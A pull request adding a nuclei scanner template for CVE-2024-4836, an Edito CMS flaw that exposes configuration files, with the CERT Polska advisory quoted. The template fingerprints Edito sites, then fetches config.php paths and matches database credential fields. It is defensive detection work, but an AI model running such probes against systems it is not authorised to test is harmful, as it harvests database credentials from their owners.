### PR TITLE
add CVE-2024-4836 

### DIFF
--- a/http/cves/2024/CVE-2024-4836.yaml
+++ b/http/cves/2024/CVE-2024-4836.yaml
@@ -5,7 +5,7 @@ info:
   author: securityforeveryone
   severity: high
   description: |
-    Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user. 
+    Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.
   reference:
     - https://cert.pl/en/posts/2024/07/CVE-2024-4836/
     - https://github.com/sleep46/CVE-2024-4836_Check

--- a/http/cves/2024/CVE-2024-4836.yaml
+++ b/http/cves/2024/CVE-2024-4836.yaml
@@ -11,12 +11,25 @@ info:
     - https://github.com/sleep46/CVE-2024-4836_Check
     - https://nvd.nist.gov/vuln/detail/CVE-2024-4836
   metadata:
-    verified: "true"
-    max-request: 1
-    fofa-query: "Edito CMS"
+    max-request: 5
+    fofa-query: icon_hash="1491301339"
   tags: cve,cve2024,cms,edito,info-leak
 
+flow: http(1) && http(2)
+
 http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_any(body,"content=\"edito", "www.edito.pl")'
+          - 'status_code==200'
+        condition: and
+        internal: true
+
   - method: GET
     path:
       - "{{BaseURL}}/config.php"
@@ -27,6 +40,6 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - 'contains(body,"db_password")'
+          - 'contains_all(body,"db_password", "db_username")'
           - 'status_code==200'
         condition: and

--- a/http/cves/2024/CVE-2024-4836.yaml
+++ b/http/cves/2024/CVE-2024-4836.yaml
@@ -1,0 +1,32 @@
+id: CVE-2024-4836
+
+info:
+  name: Edito CMS - Sensitive Data Leak
+  author: securityforeveryone
+  severity: high
+  description: |
+    Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user. 
+  reference:
+    - https://cert.pl/en/posts/2024/07/CVE-2024-4836/
+    - https://github.com/sleep46/CVE-2024-4836_Check
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-4836
+  metadata:
+    verified: "true"
+    max-request: 1
+    fofa-query: "Edito CMS"
+  tags: cve,cve2024,cms,edito,info-leak
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/config.php"
+      - "{{BaseURL}}/config/config.php"
+      - "{{BaseURL}}/include/config.php"
+      - "{{BaseURL}}/includes/config.php"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body,"db_password")'
+          - 'status_code==200'
+        condition: and


### PR DESCRIPTION
I wrote it over the python script shared yesterday. Link: https://github.com/sleep46/CVE-2024-4836_Check/blob/main/CVE-2024-4836_Check.py

https://cert.pl/en/posts/2024/07/CVE-2024-4836/

CERT Polska has received a report about a vulnerability in Edito CMS software and participated in coordination of its disclosure.

Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user. The vulnerability has been assigned [CVE-2024-4836](https://www.cve.org/CVERecord?id=CVE-2024-4836) identifier.

The issue affects versions from 3.5 through 3.25. It was removed in releases which dates from 10th of January 2014. Higher versions are not affected. It is possible to disable access to sensitive files by using a modified configuration template provided by the vendor.

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)